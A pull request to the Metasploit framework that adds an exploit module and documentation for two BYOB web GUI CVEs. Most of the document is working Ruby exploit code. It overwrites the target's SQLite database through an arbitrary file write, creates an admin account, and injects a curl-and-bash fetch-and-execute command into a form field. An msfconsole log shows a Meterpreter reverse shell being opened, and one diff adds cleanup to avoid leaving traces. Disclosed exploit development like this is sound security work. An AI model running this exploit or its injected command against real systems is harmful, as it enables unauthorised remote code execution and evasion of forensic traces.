### PR TITLE
Add BYOB Unauthenticated RCE module (CVE-2024-45256, CVE-2024-45257)

### DIFF
--- a/documentation/modules/exploit/unix/webapp/byob_unauth_rce.md
+++ b/documentation/modules/exploit/unix/webapp/byob_unauth_rce.md
@@ -54,7 +54,7 @@ No options
 
 ## Scenarios
 
-### BYOB 2.1.7 - Unauthenticated Remote Code Execution
+### BYOB 2.0 - Unauthenticated Remote Code Execution
 
 This example uses `cmd/linux/http/x64/meterpreter_reverse_tcp` to gain a reverse shell.
 

--- a/documentation/modules/exploit/unix/webapp/byob_unauth_rce.md
+++ b/documentation/modules/exploit/unix/webapp/byob_unauth_rce.md
@@ -16,7 +16,7 @@ As of version 2.1.7, these vulnerabilities remain **unpatched**.
 
 ### Install
 
-#### Version 2.1.7 Setup
+#### Version 2.0 Setup
 
 To install BYOB and test the vulnerabilities locally:
 

--- a/documentation/modules/exploit/unix/webapp/byob_unauth_rce.md
+++ b/documentation/modules/exploit/unix/webapp/byob_unauth_rce.md
@@ -1,0 +1,144 @@
+## Vulnerable Application
+
+The BYOB (Build Your Own Botnet) web GUI is vulnerable to two severe vulnerabilities:
+
+- **CVE-2024-45256**: Unauthenticated arbitrary file write leading to
+privilege escalation by adding a new admin user in the SQLite database.
+- **CVE-2024-45257**: Authenticated command injection on the payload generation page.
+
+As of version 2.1.7, these vulnerabilities remain **unpatched**.
+
+### Discoverer:
+- **Chebuya**
+- Source:
+  - [Blog Post](https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/)
+  - [PoC and Exploit](https://github.com/chebuya/exploits/tree/main/BYOB-RCE)
+
+### Install
+
+#### Version 2.1.7 Setup
+
+To install BYOB and test the vulnerabilities locally:
+
+```bash
+git clone https://github.com/malwaredllc/byob.git
+cd byob/web-ui
+./startup.sh
+python3 run.py
+```
+
+> **Note**: Avoid using Docker for this lab as BYOB itself uses Docker for building payloads.
+
+These vulnerabilities were tested only from the host machine.
+
+## Verification Steps
+
+To reproduce the Remote Code Execution (RCE) exploit:
+
+1. Start `msfconsole`.
+2. Do: `use exploit/unix/webapp/byob_unauth_rce`.
+3. Do: `set RHOSTS <ip>`.
+4. (Optional) Do: `set USERNAME <username>`.
+5. (Optional) Do: `set PASSWORD <password>`.
+6. Do: `set RPORT <port>`.
+7. Do: `set TARGETURI <path>`.
+8. Do: `set SRVPORT <port>`.
+9. Do: `set FETCH_SRVHOST <ip>`.
+10. Do: `run`.
+
+The module will attempt to exploit the vulnerabilities and execute remote code.
+
+## Options
+
+No options
+
+## Scenarios
+
+### BYOB 2.1.7 - Unauthenticated Remote Code Execution
+
+This example uses `cmd/linux/http/x64/meterpreter_reverse_tcp` to gain a reverse shell.
+
+```
+msf6 exploit(unix/http/byob_unauth_rce) > options 
+
+Module options (exploit/unix/http/byob_unauth_rce):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD                   no        Password for new admin
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     80               yes       The target port (TCP)
+   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT   6000             yes       The local port to listen on.
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                    no        The URI to use for this exploit (default is random)
+   USERNAME  admin            no        Username for new admin
+   VHOST                      no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      roTvDomWxW       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH       IuxQhs           no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix/Linux Command Shell
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(unix/http/byob_unauth_rce) > run http://192.168.1.36:5000
+[*] Exploit running as background job 21.
+[*] Exploit completed, but no session was created.
+msf6 exploit(unix/http/byob_unauth_rce) > 
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Using URL: http://192.168.1.36:6000/xK9IWU8ZxIpHV
+[*] Payload is ready at /
+[*] Generating malicious SQLite database.
+[+] Database uploaded successfully to path: /proc/self/cwd/../../../../buildyourownbotnet/database.db
+[+] Database uploaded successfully to path: /proc/self/cwd/../../../../instance/database.db
+[+] Malicious database uploaded successfully.
+[*] Registering a new admin user: admin:vZNqftVlFpmp
+[+] Registered user !
+[*] Logging in with the new admin user.
+[+] Logged in successfully!
+[*] Injecting payload via command injection.
+[*] Received request at: / - Client Address: 192.168.1.36
+[*] Sending response to 192.168.1.36 for /
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 9 opened (192.168.1.36:4444 -> 192.168.1.36:52382) at 2024-09-21 03:46:21 +0200
+
+msf6 exploit(unix/http/byob_unauth_rce) > sessions 9
+[*] Starting interaction with 9...
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-121-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+In this scenario, the payload is injected into the vulnerable
+`/api/payload/generate` endpoint, leading to command execution
+on the target server.
+The reverse shell connects back to Metasploit, providing remote access.

--- a/modules/exploits/unix/webapp/byob_unauth_rce.rb
+++ b/modules/exploits/unix/webapp/byob_unauth_rce.rb
@@ -1,0 +1,367 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'sqlite3'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'BYOB Unauthenticated RCE via Arbitrary File Write and Command Injection (CVE-2024-45256, CVE-2024-45257)',
+        'Description' => %q{
+          This module exploits two vulnerabilities in the BYOB (Build Your Own Botnet) web GUI:
+          1. CVE-2024-45256: Unauthenticated arbitrary file write that allows modification of the SQLite database, adding a new admin user.
+          2. CVE-2024-45257: Authenticated command injection in the payload generation page.
+
+          These vulnerabilities remain unpatched.
+        },
+        'Author' => [
+          'chebuya', # Discoverer and PoC
+          'Valentin Lobstein' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-45256'],
+          ['CVE', '2024-45257'],
+          ['URL', 'https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/']
+        ],
+        'Platform' => %w[unix linux],
+        'Arch' => %w[ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'Privileged' => true
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DisclosureDate' => '2024-08-15',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'SRVPORT' => 5000 },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Username for new admin', 'admin']),
+        OptString.new('PASSWORD', [false, 'Password for new admin', nil])
+      ]
+    )
+  end
+
+  def primer
+    add_resource('Path' => '/', 'Proc' => proc { |cli, req| on_request_uri_payload(cli, req) })
+    print_status('Payload is ready at /')
+  end
+
+  def on_request_uri_payload(cli, request)
+    handle_request(cli, request, payload.encoded)
+  end
+
+  def handle_request(cli, request, response_payload)
+    print_status("Received request at: #{request.uri} - Client Address: #{cli.peerhost}")
+
+    case request.uri
+    when '/'
+      print_status("Sending response to #{cli.peerhost} for /")
+      send_response(cli, response_payload)
+    else
+      print_error("Request for unknown resource: #{request.uri}")
+      send_not_found(cli)
+    end
+  end
+
+  def check
+    random_data = Rex::Text.rand_text_alphanumeric(32)
+    random_filename = Rex::Text.rand_text_alphanumeric(16)
+    random_owner = Rex::Text.rand_text_alphanumeric(8)
+    random_module = Rex::Text.rand_text_alphanumeric(6)
+    random_session = Rex::Text.rand_text_alphanumeric(6)
+
+    form_data = {
+      'data' => random_data,
+      'filename' => random_filename,
+      'type' => 'txt',
+      'owner' => random_owner,
+      'module' => random_module,
+      'session' => random_session
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'file', 'add'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => form_data,
+      'keep_cookies' => true
+    })
+
+    if res&.code == 500
+      CheckCode::Vulnerable
+    else
+      (res&.code == 200 ? CheckCode::Safe : CheckCode::Unknown)
+    end
+  end
+
+  def get_csrf(path)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, path),
+      'keep_cookies' => true
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Could not retrieve CSRF token') unless res
+
+    csrf_token = res.get_html_document.at_xpath("//input[@name='csrf_token']/@value")&.text
+    fail_with(Failure::UnexpectedReply, 'CSRF token not found') if csrf_token.nil?
+
+    csrf_token
+  end
+
+  def register_user(username, password)
+    csrf_token = get_csrf('register')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'register'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'csrf_token' => csrf_token,
+        'username' => username,
+        'password' => password,
+        'confirm_password' => password,
+        'submit' => 'Sign Up'
+      },
+      'keep_cookies' => true
+    })
+
+    res&.code == 302 ? print_good('Registered user!') : fail_with(Failure::UnexpectedReply, "User registration failed: #{res.code}")
+  end
+
+  def login_user(username, password)
+    csrf_token = get_csrf('login')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'csrf_token' => csrf_token,
+        'username' => username,
+        'password' => password,
+        'submit' => 'Log In'
+      },
+      'keep_cookies' => true
+    })
+
+    res&.code == 302 ? print_good('Logged in successfully!') : fail_with(Failure::UnexpectedReply, "Login failed: #{res.code}")
+  end
+
+  def generate_malicious_db(_username, _password)
+    mem_db = SQLite3::Database.new(':memory:')
+
+    mem_db.execute <<-SQL
+            CREATE TABLE user (
+            id INTEGER NOT NULL,
+            username VARCHAR(32) NOT NULL,
+            password VARCHAR(60) NOT NULL,
+            joined DATETIME NOT NULL,
+            bots INTEGER,
+            PRIMARY KEY (id),
+            UNIQUE (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE session (
+            id INTEGER NOT NULL,
+            uid VARCHAR(32) NOT NULL,
+            online BOOLEAN NOT NULL,
+            joined DATETIME NOT NULL,
+            last_online DATETIME NOT NULL,
+            public_ip VARCHAR(42),
+            local_ip VARCHAR(42),
+            mac_address VARCHAR(17),
+            username VARCHAR(32),
+            administrator BOOLEAN,
+            platform VARCHAR(5),
+            device VARCHAR(32),
+            architecture VARCHAR(2),
+            latitude FLOAT,
+            longitude FLOAT,
+            new BOOLEAN NOT NULL,
+            owner VARCHAR(120) NOT NULL,
+            PRIMARY KEY (uid),
+            UNIQUE (uid),
+            FOREIGN KEY(owner) REFERENCES user (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE payload (
+            id INTEGER NOT NULL,
+            filename VARCHAR(34) NOT NULL,
+            operating_system VARCHAR(3),
+            architecture VARCHAR(14),
+            created DATETIME NOT NULL,
+            owner VARCHAR(120) NOT NULL,
+            PRIMARY KEY (id),
+            UNIQUE (filename),
+            FOREIGN KEY(owner) REFERENCES user (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE exfiltrated_file (
+            id INTEGER NOT NULL,
+            filename VARCHAR(34) NOT NULL,
+            session VARCHAR(15) NOT NULL,
+            module VARCHAR(15) NOT NULL,
+            created DATETIME NOT NULL,
+            owner VARCHAR(120) NOT NULL,
+            PRIMARY KEY (id),
+            UNIQUE (filename),
+            FOREIGN KEY(owner) REFERENCES user (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE task (
+            id INTEGER NOT NULL,
+            uid VARCHAR(32) NOT NULL,
+            task TEXT,
+            result TEXT,
+            issued DATETIME NOT NULL,
+            completed DATETIME,
+            session VARCHAR(32) NOT NULL,
+            PRIMARY KEY (id),
+            UNIQUE (uid),
+            FOREIGN KEY(session) REFERENCES session (uid)
+            );
+    SQL
+
+    file = Tempfile.new('database.db')
+    src_db = SQLite3::Database.new(file.path)
+    backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')
+    backup.step(-1)
+    backup.finish
+
+    binary_data = File.binread(file.path)
+
+    base64_data = Rex::Text.encode_base64(binary_data)
+
+    file.close
+    file.unlink
+
+    base64_data
+  end
+
+  def upload_database_multiple_paths(encoded_db)
+    success = false
+    filepaths = [
+      '/proc/self/cwd/buildyourownbotnet/database.db',
+      '/proc/self/cwd/../buildyourownbotnet/database.db',
+      '/proc/self/cwd/../../../../buildyourownbotnet/database.db',
+      '/proc/self/cwd/instance/database.db',
+      '/proc/self/cwd/../../../../instance/database.db',
+      '/proc/self/cwd/../instance/database.db'
+    ]
+
+    filepaths.each do |filepath|
+      vprint_status("Trying to upload database to path: #{filepath}")
+
+      form_data = {
+        'data' => encoded_db,
+        'filename' => filepath,
+        'type' => 'txt',
+        'owner' => Faker::Internet.username,
+        'module' => Faker::App.name.downcase,
+        'session' => Faker::Alphanumeric.alphanumeric(number: 8)
+      }
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api', 'file', 'add'),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'vars_post' => form_data,
+        'keep_cookies' => true
+      )
+
+      if res&.code == 200
+        (print_good("Database uploaded successfully to path: #{filepath}")
+         success = true)
+      else
+        vprint_error("Failed to upload database to path: #{filepath}")
+      end
+    end
+
+    success
+  end
+
+  def exploit
+    # Start necessary services and perform initial setup
+    start_service
+    primer
+
+    # Define or generate admin credentials
+    username = datastore['USERNAME'] || 'admin'
+    password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)
+
+    # Generate and upload the malicious SQLite database
+    print_status('Generating malicious SQLite database.')
+    encoded_db = generate_malicious_db(username, password)
+
+    unless upload_database_multiple_paths(encoded_db)
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the database from all known paths')
+    end
+    print_good('Malicious database uploaded successfully.')
+
+    # Register the new admin user
+    print_status("Registering a new admin user: #{username}:#{password}")
+    register_user(username, password)
+
+    # Log in with the newly created admin user
+    print_status('Logging in with the new admin user.')
+    login_user(username, password)
+
+    # Prepare the malicious payload and inject it via command injection
+    print_status('Injecting payload via command injection.')
+
+    uri = get_uri.gsub(%r{^https?://}, '').chomp('/')
+    random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
+    malicious_filename = "curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename}"
+
+    payload_data = {
+      'format' => 'exe',
+      'operating_system' => "nix$(#{malicious_filename})",
+      'architecture' => 'amd64'
+    }
+
+    # Send the command injection request
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'payload', 'generate'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => payload_data,
+      'keep_cookies' => true
+    }, 0)
+
+    # Keep the web server running to maintain the service
+    service.wait
+  end
+end

--- a/modules/exploits/unix/webapp/byob_unauth_rce.rb
+++ b/modules/exploits/unix/webapp/byob_unauth_rce.rb
@@ -308,8 +308,8 @@ class MetasploitModule < Msf::Exploit::Remote
       )
 
       if res&.code == 200
-        (print_good("Database uploaded successfully to path: #{filepath}")
-         success = true)
+        print_good("Database uploaded successfully to path: #{filepath}")
+        success = true
       else
         vprint_error("Failed to upload database to path: #{filepath}")
       end

--- a/modules/exploits/unix/webapp/byob_unauth_rce.rb
+++ b/modules/exploits/unix/webapp/byob_unauth_rce.rb
@@ -113,8 +113,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res&.code == 500
       CheckCode::Vulnerable
+    case res&.code
+    when 500
+      CheckCode::Vulnerable
+    when 200
+      CheckCode::Safe
+    when nil
+      CheckCode::Unknown("The target did not respond.")
     else
-      (res&.code == 200 ? CheckCode::Safe : CheckCode::Unknown)
+      CheckCode::Unknown("The target responded with HTTP status #{res.code}")
     end
   end
 

--- a/modules/exploits/unix/webapp/byob_unauth_rce.rb
+++ b/modules/exploits/unix/webapp/byob_unauth_rce.rb
@@ -262,18 +262,16 @@ class MetasploitModule < Msf::Exploit::Remote
             );
     SQL
 
-    file = Tempfile.new('database.db')
-    src_db = SQLite3::Database.new(file.path)
-    backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')
-    backup.step(-1)
-    backup.finish
+    base64_data = Tempfile.open('database.db') do |file|
+      src_db = SQLite3::Database.new(file.path)
+      backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')
+      backup.step(-1)
+      backup.finish
+  
+      binary_data = File.binread(file.path)
 
-    binary_data = File.binread(file.path)
-
-    base64_data = Rex::Text.encode_base64(binary_data)
-
-    file.close
-    file.unlink
+      Rex::Text.encode_base64(binary_data)
+    end
 
     base64_data
   end

--- a/modules/exploits/unix/webapp/byob_unauth_rce.rb
+++ b/modules/exploits/unix/webapp/byob_unauth_rce.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
           These vulnerabilities remain unpatched.
         },
         'Author' => [
-          'chebuya', # Discoverer and PoC
+          'chebuya',          # Discoverer and PoC
           'Valentin Lobstein' # Metasploit module
         ],
         'License' => MSF_LICENSE,
@@ -266,7 +266,7 @@ class MetasploitModule < Msf::Exploit::Remote
     mem_db.execute <<-SQL
             CREATE TABLE exfiltrated_file (
             id INTEGER NOT NULL,
-            filename VARCHAR(34) NOT NULL,
+            filename VARCHAR(4096) NOT NULL,
             session VARCHAR(15) NOT NULL,
             module VARCHAR(15) NOT NULL,
             created DATETIME NOT NULL,
@@ -354,17 +354,15 @@ class MetasploitModule < Msf::Exploit::Remote
         remote_file.syswrite(binary_content)
         remote_file.close
         successful_restore = true
-      rescue ::StandardError => e
-        print_error("Failed to restore the database: #{e.class} #{e}")
       end
 
       if successful_restore
         print_good('Database has been successfully restored to its clean state.')
       else
-        print_error('Failed to restore the database on all attempted paths.')
+        print_error('Failed to restore the database on all attempted paths, but proceeding with the exploitation.')
       end
     else
-      print_error('This is not a Meterpreter session. Cannot proceed with database reset.')
+      print_error('This is not a Meterpreter session. Cannot proceed with database reset, but exploitation continues.')
     end
   end
 

--- a/modules/exploits/unix/webapp/byob_unauth_rce.rb
+++ b/modules/exploits/unix/webapp/byob_unauth_rce.rb
@@ -88,6 +88,24 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'keep_cookies' => true
+    })
+
+    if res
+      doc = res.get_html_document
+
+      unless doc.at('title')&.text&.include?('Build Your Own Botnet') || doc.at('meta[name="description"]')&.attr('content')&.include?('Build Your Own Botnet')
+        return CheckCode::Safe('The target does not appear to be BYOB.')
+      end
+    else
+      return CheckCode::Unknown('The target did not respond to the initial check.')
+    end
+
+    print_good('The target appears to be BYOB.')
+
     random_data = Rex::Text.rand_text_alphanumeric(32)
     random_filename = Rex::Text.rand_text_alphanumeric(16)
     random_owner = Rex::Text.rand_text_alphanumeric(8)
@@ -112,16 +130,16 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res&.code == 500
-      CheckCode::Vulnerable
-    case res&.code
-    when 500
-      CheckCode::Vulnerable
-    when 200
-      CheckCode::Safe
-    when nil
-      CheckCode::Unknown("The target did not respond.")
+      return CheckCode::Vulnerable
     else
-      CheckCode::Unknown("The target responded with HTTP status #{res.code}")
+      case res&.code
+      when 200
+        return CheckCode::Safe
+      when nil
+        return CheckCode::Unknown('The target did not respond.')
+      else
+        return CheckCode::Unknown("The target responded with HTTP status #{res.code}")
+      end
     end
   end
 
@@ -157,7 +175,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     })
 
-    res&.code == 302 ? print_good('Registered user!') : fail_with(Failure::UnexpectedReply, "User registration failed: #{res.code}")
+    if res.nil?
+      fail_with(Failure::UnexpectedReply, 'No response from the server.')
+    elsif res.code == 302
+      print_good('Registered user!')
+    else
+      fail_with(Failure::UnexpectedReply, "User registration failed: #{res.code}")
+    end
   end
 
   def login_user(username, password)
@@ -176,10 +200,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     })
 
-    res&.code == 302 ? print_good('Logged in successfully!') : fail_with(Failure::UnexpectedReply, "Login failed: #{res.code}")
+    if res.nil?
+      fail_with(Failure::UnexpectedReply, 'No response from the server.')
+    elsif res.code == 302
+      print_good('Logged in successfully!')
+    else
+      fail_with(Failure::UnexpectedReply, "Login failed: #{res.code}")
+    end
   end
 
-  def generate_malicious_db(_username, _password)
+  def generate_malicious_db
     mem_db = SQLite3::Database.new(':memory:')
 
     mem_db.execute <<-SQL
@@ -267,7 +297,7 @@ class MetasploitModule < Msf::Exploit::Remote
       backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')
       backup.step(-1)
       backup.finish
-  
+
       binary_data = File.binread(file.path)
 
       Rex::Text.encode_base64(binary_data)
@@ -276,8 +306,8 @@ class MetasploitModule < Msf::Exploit::Remote
     base64_data
   end
 
-  def upload_database_multiple_paths(encoded_db)
-    success = false
+  def upload_database_multiple_paths
+    successful_paths = []
     filepaths = [
       '/proc/self/cwd/buildyourownbotnet/database.db',
       '/proc/self/cwd/../buildyourownbotnet/database.db',
@@ -288,10 +318,8 @@ class MetasploitModule < Msf::Exploit::Remote
     ]
 
     filepaths.each do |filepath|
-      vprint_status("Trying to upload database to path: #{filepath}")
-
       form_data = {
-        'data' => encoded_db,
+        'data' => @encoded_db,
         'filename' => filepath,
         'type' => 'txt',
         'owner' => Faker::Internet.username,
@@ -307,15 +335,37 @@ class MetasploitModule < Msf::Exploit::Remote
         'keep_cookies' => true
       )
 
-      if res&.code == 200
-        print_good("Database uploaded successfully to path: #{filepath}")
-        success = true
-      else
-        vprint_error("Failed to upload database to path: #{filepath}")
-      end
+      successful_paths << filepath if res&.code == 200
     end
 
-    success
+    successful_paths
+  end
+
+  def on_new_session(session)
+    if session.type == 'meterpreter'
+      binary_content = Rex::Text.decode_base64(@encoded_db)
+
+      print_status('Restoring the database via Meterpreter to avoid leaving traces.')
+
+      successful_restore = false
+
+      @successful_paths.each do |remote_path|
+        remote_file = session.fs.file.new(remote_path, 'wb')
+        remote_file.syswrite(binary_content)
+        remote_file.close
+        successful_restore = true
+      rescue ::StandardError => e
+        print_error("Failed to restore the database: #{e.class} #{e}")
+      end
+
+      if successful_restore
+        print_good('Database has been successfully restored to its clean state.')
+      else
+        print_error('Failed to restore the database on all attempted paths.')
+      end
+    else
+      print_error('This is not a Meterpreter session. Cannot proceed with database reset.')
+    end
   end
 
   def exploit
@@ -329,12 +379,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Generate and upload the malicious SQLite database
     print_status('Generating malicious SQLite database.')
-    encoded_db = generate_malicious_db(username, password)
+    @encoded_db = generate_malicious_db
 
-    unless upload_database_multiple_paths(encoded_db)
+    @successful_paths = upload_database_multiple_paths
+
+    if @successful_paths.empty?
       fail_with(Failure::UnexpectedReply, 'Failed to upload the database from all known paths')
+    else
+      print_good("Malicious database uploaded successfully to the following paths: #{@successful_paths.join(', ')}")
     end
-    print_good('Malicious database uploaded successfully.')
 
     # Register the new admin user
     print_status("Registering a new admin user: #{username}:#{password}")
@@ -350,7 +403,6 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = get_uri.gsub(%r{^https?://}, '').chomp('/')
     random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"
     malicious_filename = "curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename}"
-
     payload_data = {
       'format' => 'exe',
       'operating_system' => "nix$(#{malicious_filename})",
@@ -364,7 +416,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/x-www-form-urlencoded',
       'vars_post' => payload_data,
       'keep_cookies' => true
-    }, 0)
+    }, 5)
 
     # Keep the web server running to maintain the service
     service.wait


### PR DESCRIPTION
Hello Metasploit Team,

I hope this message finds you well. 

I am submitting a new module that exploits two critical vulnerabilities identified in the **BYOB (Build Your Own Botnet) v2.0.0**. These vulnerabilities include an **Unauthenticated Arbitrary File Write (CVE-2024-45256)** and an **Authenticated Command Injection (CVE-2024-45257)**, which allows attackers to bypass authentication and achieve Remote Code Execution (RCE). The latest BYOB version still remains vulnerable as of today.

### Module Overview:
1. **Arbitrary File Write**: The exploit takes advantage of the file upload feature to overwrite the SQLite database, allowing the creation of a new admin user without authentication.
2. **Command Injection**: After gaining admin privileges, it leverages a command injection vulnerability in the payload generation feature to execute arbitrary commands.

### Testing:
This module has been tested against BYOB versions 2.0.0 on Linux Mint environment running Python 3.10.12.

### Verification Steps:
1. Start the Metasploit console
2. Use the module: `exploit/unix/webapp/byob_unauth_rce`
3. Set the target information, including RHOST,  RPORT, etc.
4. Run the exploit, and a reverse shell will be triggered on successful exploitation.

Thank you for reviewing this contribution. Looking forward to your feedback!